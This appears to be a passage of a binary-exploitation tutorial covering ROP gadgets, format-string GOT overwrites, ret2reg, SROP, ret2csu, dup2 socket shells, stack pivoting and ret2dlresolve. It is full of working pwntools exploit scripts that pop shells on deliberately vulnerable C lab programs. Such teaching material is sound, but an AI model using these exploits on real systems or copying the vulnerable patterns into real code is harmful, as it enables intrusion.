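If you just want to see that register setup written out, pwntools' shellcraft will generate it for you; a quick sketch (the exact assembly emitted may differ between versions):

```python
from pwn import *

context.arch = 'amd64'
# prints assembly that places "/bin/sh" in memory, sets RAX = 0x3b (execve),
# RDI = pointer to the string, RSI = 0 and RDX = 0, then runs the syscall instruction
print(shellcraft.execve('/bin/sh', 0, 0))
```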
Controlling execution with snippets of code
Gadgets are small snippets of code followed by a ret
instruction, e.g. pop rdi; ret
. We can manipulate the ret
of these gadgets in such a way as to string together a large chain of them to do what we want.
Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret
gadget.
What happens is fairly obvious - 0x10
gets popped into rdi
as it is at the top of the stack during the pop rdi
. Once the pop
occurs, rsp
moves:
And since ret
is equivalent to pop rip
, 0x5655576724
gets moved into rip
. Note how the stack is laid out for this.
When we overwrite the return pointer, we overwrite the value pointed at by rsp
. Once that value is popped, rsp points at the next value on the stack - but wait, we can overwrite that next value in the stack too.
Let's say that we want to exploit a binary to jump to a pop rdi; ret
gadget, pop 0x100
into rdi
then jump to flag()
. Let's step-by-step the execution.
On the original ret
, which we overwrite the return pointer for, we pop the gadget address in. Now rip
moves to point to the gadget, and rsp
moves to the next memory address.
rsp
moves to the 0x100
; rip
to the pop rdi
. Now when we pop, 0x100
gets moved into rdi
.
RSP moves onto the next item on the stack, the address of flag()
. The ret
is executed and flag()
is called.
Essentially, if the gadget pops values from the stack, simply place those values afterwards (including the pop rip
in ret
). If we want to pop 0x10
into rdi
and then jump to 0x16
, our payload would look like this:
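In pwntools terms, a sketch of that payload (the padding and the gadget address are hypothetical placeholders):

```python
from pwn import *
context.arch = 'amd64'

padding = 40          # hypothetical offset to the saved return pointer
POP_RDI = 0x401234    # hypothetical address of the pop rdi; ret gadget

payload = flat(
    b'A' * padding,   # fill the buffer up to the saved return pointer
    POP_RDI,          # overwrites the saved RIP, so the ret jumps to the gadget
    0x10,             # now at the top of the stack, so pop rdi takes it
    0x16              # the gadget's own ret then "pops" this into rip
)
```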
Note if you have multiple pop
instructions, you can just add more values.
We can use the ROPgadget tool to find possible gadgets.
Combine it with grep
to look for specific registers.
char buffer[20];
gets(buffer);
printf(buffer);
char buffer[20];
gets(buffer);
system(buffer);
#include <stdio.h>
void vuln() {
char buffer[300];
while(1) {
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
puts("");
}
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
$ ./got_overwrite
%p %p %p %p %p %p
0x12c 0xf7fa7580 0x8049191 0x340 0x25207025 0x70252070
$./got_overwrite
%5$p
0x70243525
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.interactive()
from pwn import *
elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000 # ASLR disabled
p = process()
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
p.clean()
p.sendline('/bin/sh')
p.interactive()
#include <stdio.h>
void vuln() {
char buffer[20];
puts("Give me the input");
gets(buffer);
}
int main() {
vuln();
return 0;
}
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of puts
rop.raw(elf.got['puts']) # now our shellcode is written there, we can continue execution from there
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of puts
rop.raw(elf.got['puts']) # now our shellcode is written there, we can continue execution from there
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
#include <stdio.h>
int test = 0;
int main() {
char input[100];
puts("Get me with shellcode and RSP!");
gets(input);
if(test) {
asm("jmp *%rsp");
return 0;
}
else {
return 0;
}
}
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
# we use elf.search() because we don't need those instructions directly,
# just any sequence of \xff\xe4
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = flat(
'A' * 120, # padding
jmp_rsp, # RSP will be pointing to shellcode, so we jump there
asm(shellcraft.sh()) # place the shellcode
)
p.sendlineafter('RSP!\n', payload)
p.interactive()
sub rsp, 0x20
jmp rsp
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = b'A' * 120
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 10;
jmp rsp;
''')
pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
jmp_rsp = next(elf.search(asm('jmp rsp')))
payload = asm(shellcraft.sh())
payload = payload.ljust(120, b'A')
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 128;
jmp rsp;
''') # 128 we found with r2
p.sendlineafter('RSP!\n', payload)
p.interactive()
Controlling all registers at once
A sigreturn is a special type of syscall. The purpose of sigreturn is to return from a signal handler and clean up the stack frame after the signal has been handled.
What this involves is the kernel storing all the register values on the stack when the signal is delivered. When sigreturn is called, all the values are popped back in (RSP points to the bottom of the sigreturn frame, this collection of register values).
By leveraging a sigreturn
, we can control all register values at once - amazing! Yet this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a super powerful technique - especially with limited gadgets.
Quick shells and pointers
A one_gadget
is simply an execve("/bin/sh")
call that is present in glibc, and this can be a quick win with GOT overwrites - next time the function is called, the one_gadget
is executed and the shell is popped.
__malloc_hook
is a feature in C. The Official GNU site defines __malloc_hook
as:
The value of this variable is a pointer to the function that
malloc
uses whenever it is called.
To summarise, when you call malloc()
the function __malloc_hook
points to also gets called - so if we can overwrite this with, say, a one_gadget
, and somehow trigger a call to malloc()
, we can get an easy shell.
Luckily there is a tool written in Ruby called one_gadget
. To install it, run:
gem install one_gadget
And then you can simply run
one_gadget libc
Wait a sec - isn't malloc()
a heap function? How will we use it on the stack? Well, you can actually trigger malloc
by calling printf("%10000$c")
(this allocates too many bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you have a format string vulnerability, calling malloc is trivial.
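As a rough sketch of how this might look against the 32-bit GOT-overwrite binary from earlier (ASLR still disabled) - the one_gadget offset here is a made-up value that you would replace with whatever the tool reports:

```python
from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000              # ASLR disabled, as before
ONE_GADGET = libc.address + 0x5f065    # hypothetical offset from the one_gadget tool

p = process()

# overwrite __malloc_hook with the one_gadget (buffer is at offset 5, as before)
payload = fmtstr_payload(5, {libc.sym['__malloc_hook']: ONE_GADGET})
p.sendline(payload)
p.clean()

p.sendline('%10000$c')   # huge positional parameter forces printf to call malloc(), triggering the hook
p.interactive()
```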
This is a hard technique to give you practise on, due to the fact that your libc
version may not even have working one_gadgets
. As such, feel free to play around with the GOT overwrite binary and see if you can get a one_gadget
working.
Remember, the value given by the one_gadget
tool needs to be added to libc base as it's just an offset.
To make it super simple, I made it in assembly using pwntools:
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 300;
syscall;
ret;
pop rax;
ret;
pop rdi;
ret;
pop rsi;
ret;
pop rdx;
ret;
'''
)
elf.save('vuln')
The binary contains all the gadgets you need! First it executes a read
syscall, writes to the stack, then the ret
occurs and you can gain control.
But what about the /bin/sh
? I slightly cheesed this one and couldn't be bothered to add it to the assembly, so I just did:
echo -en "/bin/sh\x00" >> vuln
As we mentioned before, we need the following layout in the registers:
RAX: 0x3b
RDI: pointer to /bin/sh
RSI: 0x0
RDX: 0x0
To get the address of the gadgets, I'll just do objdump -d vuln
. The address of /bin/sh
can be found using strings:
$ strings -t x vuln | grep bin
1250 /bin/sh
The offset from the base to the string is 0x1250
(-t x
tells strings
to print the offset as hex). Armed with all this information, we can set up the constants:
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
binsh = elf.address + 0x1250
POP_RAX = 0x10000018
POP_RDI = 0x1000001a
POP_RSI = 0x1000001c
POP_RDX = 0x1000001e
SYSCALL = 0x10000015
Now we just need to populate the registers. I'll tell you the padding is 8
to save time:
payload = flat(
'A' * 8,
POP_RAX,
0x3b,
POP_RDI,
binsh,
POP_RSI,
0x0,
POP_RDX,
0X0,
SYSCALL
)
p.sendline(payload)
p.interactive()
And wehey - we get a shell!
Using Registers to bypass ASLR
ret2reg simply involves jumping to register addresses rather than hardcoded addresses, much like Using RSP for Shellcode. For example, you may find RAX always points at your buffer when the ret
is executed, so you could utilise a call rax
or jmp rax
to continue from there.
The reason RAX is the most common for this technique is that, by convention, the return value of a function is stored in RAX. For example, take the following basic code:
#include <stdio.h>
int test() {
return 0xdeadbeef;
}
int main() {
test();
return 0;
}
If we compile and disassemble the function, we get this:
0x55ea94f68125 55 push rbp
0x55ea94f68126 4889e5 mov rbp, rsp
0x55ea94f68129 b8efbeadde mov eax, 0xdeadbeef
0x55ea94f6812e 5d pop rbp
0x55ea94f6812f c3 ret
As you can see, the value 0xdeadbeef
is being moved into EAX.
$ ROPgadget --binary vuln-64
Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]
$ ROPgadget --binary vuln-64 | grep rdi
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret
Any function that returns a pointer to the string once it acts on it is a prime target. There are many that do this, including stuff like gets()
, strcpy()
and fgets()
. We'll keep it simple and use gets()
as an example.
#include <stdio.h>
void vuln() {
char buffer[100];
gets(buffer);
}
int main() {
vuln();
return 0;
}
First, let's make sure that some register does point to the buffer:
$ r2 -d -A vuln
[0x7f8ac76fa090]> pdf @ sym.vuln
; CALL XREF from main @ 0x401147
┌ 28: sym.vuln ();
│ ; var int64_t var_70h @ rbp-0x70
│ 0x00401122 55 push rbp
│ 0x00401123 4889e5 mov rbp, rsp
│ 0x00401126 4883ec70 sub rsp, 0x70
│ 0x0040112a 488d4590 lea rax, [var_70h]
│ 0x0040112e 4889c7 mov rdi, rax
│ 0x00401131 b800000000 mov eax, 0
│ 0x00401136 e8f5feffff call sym.imp.gets ; char *gets(char *s)
│ 0x0040113b 90 nop
│ 0x0040113c c9 leave
└ 0x0040113d      c3             ret
Now we'll set a breakpoint on the ret
in vuln()
, continue and enter text.
[0x7f8ac76fa090]> db 0x0040113d
[0x7f8ac76fa090]> dc
hello
hit breakpoint at: 40113d
We've hit the breakpoint, so let's check if RAX points to our buffer. We'll check RAX first because that's the traditional register to use for the return value.
[0x0040113d]> dr rax
0x7ffd419895c0
[0x0040113d]> ps @ 0x7ffd419895c0
hello
And indeed it does!
We now just need a jmp rax
gadget or equivalent. I'll use ROPgadget for this and look for either jmp rax
or call rax
:
$ ROPgadget --binary vuln | grep -iE "(jmp|call) rax"
0x0000000000401009 : add byte ptr [rax], al ; test rax, rax ; je 0x401019 ; call rax
0x0000000000401010 : call rax
0x000000000040100e : je 0x401014 ; call rax
0x0000000000401095 : je 0x4010a7 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d7 : je 0x4010e7 ; mov edi, 0x404030 ; jmp rax
0x000000000040109c : jmp rax
0x0000000000401097 : mov edi, 0x404030 ; jmp rax
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x000000000040100c : test eax, eax ; je 0x401016 ; call rax
0x0000000000401093 : test eax, eax ; je 0x4010a9 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d5 : test eax, eax ; je 0x4010e9 ; mov edi, 0x404030 ; jmp rax
0x000000000040100b : test rax, rax ; je 0x401017 ; call rax
There's a jmp rax
at 0x40109c
, so I'll use that. The padding up until RIP is 120
; I assume you can calculate this yourselves by now, so I won't bother showing it.
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
JMP_RAX = 0x40109c
payload = asm(shellcraft.sh()) # front of buffer <- RAX points here
payload = payload.ljust(120, b'A') # pad until RIP
payload += p64(JMP_RAX) # jump to the buffer - return value of gets()
p.sendline(payload)
p.interactive()
Awesome!
As with the syscalls, I made the binary using the pwntools ELF features:
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 500;
syscall;
ret;
pop rax;
ret;
''', vma=0x41000
)
elf.save('vuln')
It's quite simple - a read
syscall, followed by a pop rax; ret
gadget. You can't control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.
Once again, I added a shell string (this time /bin/bash) to the binary:
echo -en "/bin/bash\x00" >> vuln
First let's plonk down the available gadgets and their location, as well as the location of /bin/sh
.
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015
From here, I suggest you try the payload yourself. The padding (as you can see in the assembly) is 8
bytes until RIP, then you'll need to trigger a sigreturn
, followed by the values of the registers.
The triggering of a sigreturn
is easy - sigreturn is syscall 0xf
(15
), so we just pop that into RAX and call syscall
:
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
Now the syscall looks at the location of RSP for the register values; we'll have to fake them. They have to be in a specific order, but luckily for us pwntools has a cool feature called a SigreturnFrame()
that handles the order for us.
frame = SigreturnFrame()
Now we just need to decide what the register values should be. We want to trigger an execve()
syscall, so we'll set the registers to the values we need for that:
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
However, in order to trigger this we also have to control RIP and point it back at the syscall
gadget, so the execve actually executes:
frame.rip = SYSCALL_RET
We then append it to the payload and send.
payload += bytes(frame)
p.sendline(payload)
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015
frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
frame.rip = SYSCALL_RET
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
payload += bytes(frame)
p.sendline(payload)
p.interactive()
As of glibc 2.34, the CSU has been hardened to remove the useful gadgets. The offending patch essentially removes __libc_csu_init
(as well as a couple of other functions) entirely.
Unfortunately, changing this breaks the ABI (application binary interface), meaning that any binaries compiled in this way cannot run on pre-2.34 glibc versions - which can make things quite annoying for CTF challenges if you have an outdated glibc version. Older compilations, however, can work on the newer versions.
Controlling registers when gadgets are lacking
ret2csu is a technique for populating registers when there is a lack of gadgets. More information can be found in the original paper, but a summary is as follows:
When an application is dynamically linked (compiled with libc linked to it), it contains a selection of functions to facilitate that linking. These functions contain within them a selection of gadgets that we can use to populate registers we lack gadgets for, most importantly __libc_csu_init
, which contains the following two gadgets:
The second might not look like a gadget, but if you look it calls r15 + rbx*8
. The first gadget chain allows us to control both r15
and rbx
in that series of huge pop
operations, meaning we can control where the second gadget calls afterwards.
These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX and RSI registers (which are important for parameters) via the second gadget, then jump wherever we wish by simply controlling r15
and rbx
to workable values.
This means we can potentially pull off syscalls for execve
, or populate parameters for functions such as write()
.
File Descriptors and Sockets
File Descriptors are integers that represent connections to sockets or files or whatever you're connecting to. In Unix systems, there are 3
main file descriptors (often abbreviated fd) for each application:
These are, as shown above, standard input, output and error. You've probably used them before yourself, for example to hide errors when running commands:
Here you're piping stderr
to /dev/null
, which is the same principle.
Many binaries in CTFs use programs such as socat
to redirect stdin
and stdout
(and sometimes stderr
) to the user when they connect. These are super simple and often require no more than a replacement of
With the line
Others, however, implement their own socket programming in C. In these scenarios, stdin
and stdout
may not be shown back to the user.
The reason for this is that every new connection has a different fd. If you listen in C, since fds 0-2 are reserved, the listening socket will often be assigned fd 3
. Once we connect, we set up another fd, fd 4
(neither the 3
nor the 4
is certain, but statistically likely).
In these scenarios, it's just as simple to pop a shell. This shell, however, is not shown back to the user - it's shown back to the terminal running the server. Why? Because it utilises fd 0
, 1
and 2
for its I/O.
Here we have to tell the program to duplicate the file descriptor in order to redirect stdin
and stdout
to fd 4
, and glibc provides a simple way to do so.
The dup
syscall (and C function) duplicates an fd onto the lowest-numbered free fd, so we can't choose which fd the socket gets copied onto. Instead, we use dup2()
, which takes in two parameters: an oldfd
and a newfd
. Descriptor oldfd
is duplicated onto newfd
, allowing us to interact with stdin
and stdout
and actually use any shell we may have popped.
Note that the man page outlines how, if newfd is already in use, it is silently closed - which is exactly what we want.
More on socat
socat
is a "multipurpose relay" often used to serve binary exploitation challenges in CTFs. Essentially, it transfers stdin
and stdout
to the socket and also allows simple forking capabilities. The following is an example of how you could host a binary on port 5000
:
Most of the command is fairly logical (and the rest you can look up). The important part is that in this scenario we don't have to duplicate the file descriptors ourselves, as socat
does it all for us.
What is important, however, is pty
mode. Because pty
mode allows you to communicate with the process as if you were a user, it takes in input literally - including DELETE characters. If you send a \x7f
- a DELETE
- it will literally delete the previous character (as shown shortly in my writeup). This is incredibly relevant because in 64-bit the \x7f
is almost always present in glibc addresses, so it's not quite so possible to avoid (although you could keep rerunning the exploit until the rare occasion you get an 0x7e...
libc base).
To bypass this we use the socat
pty
escape character \x16
and prepend it to any \x7f
we send across.
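A tiny helper along those lines (purely illustrative):

```python
def escape_pty(data: bytes) -> bytes:
    # prepend socat's pty escape character (0x16) to every DELETE byte (0x7f),
    # so it is passed through literally instead of deleting the previous character
    return data.replace(b'\x7f', b'\x16\x7f')

# usage: p.sendline(escape_pty(p64(libc.address + offset)))
```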
Duplicating the Descriptors
I'll include source.c
, but most of it is socket programming derived from an online tutorial. The two relevant functions - vuln()
and win()
- I'll list below.
Quite literally an easy ret2win.
Start the binary with ./vuln 9001
.
Basic setup, except it's a remote process:
I pass in a basic pattern and pause directly before:
Once the pause()
is reached, I hook on with radare2 and set a breakpoint at the ret
.
Ok, so the offset is 40
.
Should be fairly simple, right?
What the hell?
But if we look on the server itself:
A shell was popped there! This is the file descriptor behaviour we talked about before.
So we have a shell, but no way to control it. Time to use dup2
.
As we know, we need to call dup2(oldfd, newfd)
. oldfd
will be 4
(our connection fd) and newfd
will be 0
and 1
(we need to call it twice to redirect both stdin
and stdout
). Knowing what you do about the PLT, have a go at doing this and then calling win()
. The answer is below.
Since we need two parameters, we'll need to find a gadget for RDI and RSI. I'll use ROPgadget
to find these.
Plonk these values into the script.
Now to get all the calls to dup2()
.
And wehey - the file descriptors were successfully duplicated!
These kinds of chains are where pwntools' ROP capabilities really come into their own:
Works perfectly and is much shorter and more readable!
Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of this. Try calling win()
, and to do that you have to populate the register rdx
. Try what we've talked about, and then have a look at the answer if you get stuck.
We can work out the addresses of the massive chains using r2, and chuck this all into pwntools.
Now we need to find a memory location that has the address of win()
written into it so that we can point r15
at it. I'm going to opt to call gets()
again instead, and then input the address. The location we input to is a fixed location of our choice, which is reliable. Now we just need to find a location.
To do this, I'll run r2 on the binary then dcu main
to continue until main. Now let's check permissions:
The third location is RW, so let's check it out.
The address 0x404028
appears unused, so I'll write win()
there.
To do this, I'll just use the ROP class.
Now we have the address written there, let's just get the massive ropchain and plonk it all in
Don't forget to pass a parameter to the gets()
:
And we have successfully controlled RDX - without any RDX gadgets!
As you probably noticed, we don't need to pop off r12 or r13, so we can move POP_CHAIN
a couple of instructions along:
#include <stdio.h>
int win(int x, int y, int z) {
if(z == 0xdeadbeefcafed00d) {
puts("Awesome work!");
}
}
int main() {
puts("Come on then, ret2csu me");
char input[30];
gets(input);
return 0;
}
[...]
0x00401208 4c89f2 mov rdx, r14
0x0040120b 4c89ee mov rsi, r13
0x0040120e 4489e7 mov edi, r12d
0x00401211 41ff14df call qword [r15 + rbx*8]
0x00401215 4883c301 add rbx, 1
0x00401219 4839dd cmp rbp, rbx
0x0040121c 75ea jne 0x401208
0x0040121e 4883c408 add rsp, 8
0x00401222 5b pop rbx
0x00401223 5d pop rbp
0x00401224 415c pop r12
0x00401226 415d pop r13
0x00401228 415e pop r14
0x0040122a 415f pop r15
0x0040122c c3 ret
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
[0x00401199]> dm
0x0000000000400000 - 0x0000000000401000 - usr 4K s r--
0x0000000000401000 - 0x0000000000402000 * usr 4K s r-x
0x0000000000402000 - 0x0000000000403000 - usr 4K s r--
0x0000000000403000 - 0x0000000000404000 - usr 4K s r--
0x0000000000404000 - 0x0000000000405000 - usr 4K s rw-
[0x00401199]> pxq @ 0x0000000000404000
0x00404000 0x0000000000403e20 0x00007f7235252180 >@......!%5r...
0x00404010 0x00007f723523c5e0 0x0000000000401036 ..#5r...6.@.....
0x00404020 0x0000000000401046 0x0000000000000000 F.@.............
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's written
print(p.recvline()) # should receive "Awesome work!"
from pwn import *
elf = context.binary = ELF('./vuln')
p = process()
rop = ROP(elf)
POP_CHAIN = 0x00401228 # pop r14, pop r15, ret
REG_CALL = 0x00401208 # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function!
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))
print(p.recvline())
0x004011a2 5b pop rbx
0x004011a3 5d pop rbp
0x004011a4 415c pop r12
0x004011a6 415d pop r13
0x004011a8 415e pop r14
0x004011aa 415f pop r15
0x004011ac c3 ret
0x00401188 4c89f2 mov rdx, r14 ; char **ubp_av
0x0040118b 4c89ee mov rsi, r13 ; int argc
0x0040118e 4489e7 mov edi, r12d ; func main
0x00401191 41ff14df call qword [r15 + rbx*8]
Name
fd
stdin
0
stdout
1
stderr
2
find / -name secret.txt 2>/dev/null
p = process()
p = remote(host, port)
socat tcp-l:5000,reuseaddr,fork EXEC:"./vuln",pty,stderr
Lack of space for ROP
Stack Pivoting is a technique we use when we lack space on the stack - for example, we have 16 bytes past RIP. In this scenario, we're not able to complete a full ROP chain.
During Stack Pivoting, we take control of the RSP register and "fake" the location of the stack. There are a few ways to do this.
A pop rsp gadget is possibly the simplest approach, but also the least likely to exist. If there is one of these, you're quite lucky.
If you can find a pop <reg>
gadget and an xchg <reg>, rsp gadget, you can pop the address of your fake stack into the register and then swap it into RSP. It requires about 16 bytes of stack space after the saved return pointer:
pop <reg> <=== return pointer
<reg value>
xchg <reg>, rsp
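As a sketch in pwntools terms (all of the addresses here are hypothetical placeholders, and FAKE_STACK is somewhere you have already written a longer ROP chain):

```python
from pwn import *
context.arch = 'amd64'

PADDING      = 40          # hypothetical offset to the saved return pointer
POP_RAX      = 0x401234    # pop rax; ret
XCHG_RAX_RSP = 0x401236    # xchg rax, rsp; ret
FAKE_STACK   = 0x404900    # where the real ROP chain has already been written

payload = flat(
    b'A' * PADDING,
    POP_RAX,        # overwrites the saved return pointer
    FAKE_STACK,     # popped into rax
    XCHG_RAX_RSP    # rsp now points at FAKE_STACK, so its contents run as a ROP chain
)
```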
Using leave; ret is a very interesting way of stack pivoting, and it only requires 8 bytes.
Every function (except main
) is ended with a leave; ret
gadget. leave
is equivalent to
mov rsp, rbp
pop rbp
Note that the function ending therefore looks like
mov rsp, rbp
pop rbp
pop rip
That means that when we overwrite RIP the 8 bytes before that overwrite RBP (you may have noticed this before). So, cool - we can overwrite rbp
using leave
. How does that help us?
Well if we look at leave
again, we notice the value in RBP gets moved into RSP! So if we overwrite RBP and then overwrite RIP with the address of a leave; ret
again, the value in RBP gets moved to RSP. And, even better, we don't need any more stack space than just overwriting RIP, making it very compressed.
To display an example program, we will use the example given on the pwntools entry for ret2dlresolve:
#include <unistd.h>
void vuln(void){
char buf[64];
read(STDIN_FILENO, buf, 200);
}
int main(int argc, char** argv){
vuln();
}
pwntools contains a fancy Ret2dlresolvePayload
that can automate the majority of our exploit:
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
Let's use rop.dump()
to break down what's happening.
[DEBUG] PLT 0x8049030 read
[DEBUG] PLT 0x8049040 __libc_start_main
[DEBUG] Symtab: 0x804820c
[DEBUG] Strtab: 0x804825c
[DEBUG] Versym: 0x80482a6
[DEBUG] Jmprel: 0x80482d8
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
[DEBUG] Version index addr: 0x8048c26
[DEBUG] Data addr: 0x804ce00
[DEBUG] PLT_INIT: 0x8049020
[*] 0x0000: b'AAAA' 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[...]
0x004c: 0x8049030 read(0, 0x804ce00)
0x0050: 0x804921a <adjust @0x5c> pop edi; pop ebp; ret
0x0054: 0x0 arg0
0x0058: 0x804ce00 arg1
0x005c: 0x8049020 [plt_init] system(0x804ce24)
0x0060: 0x4b44 [dlresolve index]
0x0064: b'zaab' <return address>
0x0068: 0x804ce24 arg0
As we expected - it's a read
followed by a call to plt_init
with the parameter 0x0804ce24
. Our fake structures are being read in at 0x804ce00
. The logging at the top tells us where all the structures are placed.
[DEBUG] ElfSym addr: 0x804ce0c
[DEBUG] ElfRel addr: 0x804ce1c
[DEBUG] Symbol name addr: 0x804ce00
Now we know where the fake structures are placed. Since I ran the script with the DEBUG
parameter, I'll check what gets sent.
00000000 73 79 73 74 65 6d 00 61 63 61 61 61 a4 4b 00 00 │syst│em·a│caaa│·K··│
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 ce 04 08 │····│····│····│····│
00000020 07 c0 04 00 2f 62 69 6e 2f 73 68 00 0a │····│/bin│/sh·│·│
0000002d
system
is being written to 0x804ce00
- as the debug said the Symbol name addr
would be placed
After that, at 0x804ce0c
, the Elf32_Sym
struct starts. First it contains the table index of that string, which in this case is 0x4ba4
as it is a very long way off the actual table. Next it contains the other values on the struct, but they are irrelevant and so zeroed out.
At 0x804ce1c
that Elf32_Rel
struct starts; first it contains the address of the system
string, 0x0804ce00
, then the r_info
variable - if you remember this specifies the R_SYM
, which is used to link the SYMTAB
and the STRTAB
.
After all the structures we place the string /bin/sh
at 0x804ce24
- which, if you remember, was the argument passed to system
when we printed the rop.dump()
:
0x005c: 0x8049020 [plt_init] system(0x804ce24)
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)
# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the correct, calculated reloc_offset
log.info(rop.dump())
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all the relevant structures in
p.interactive()
Using a pop rsp gadget to stack pivot
First off, let's grab all the gadgets. I'll use ROPgadget
again to do so:
$ ROPgadget --binary vuln | grep 'pop rsp'
0x0000000000401225 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
$ ROPgadget --binary vuln | grep 'pop rdi'
0x000000000040122b : pop rdi ; ret
$ ROPgadget --binary vuln | grep 'pop rsi'
0x0000000000401229 : pop rsi ; pop r15 ; ret
Now we have all the gadgets, let's chuck them into the script:
POP_CHAIN = 0x401225 # RSP, R13, R14, R15, ret
POP_RDI = 0x40122b
POP_RSI_R15 = 0x401229
Let's just make sure the pop
works by sending a basic chain and then breaking on ret
and stepping through.
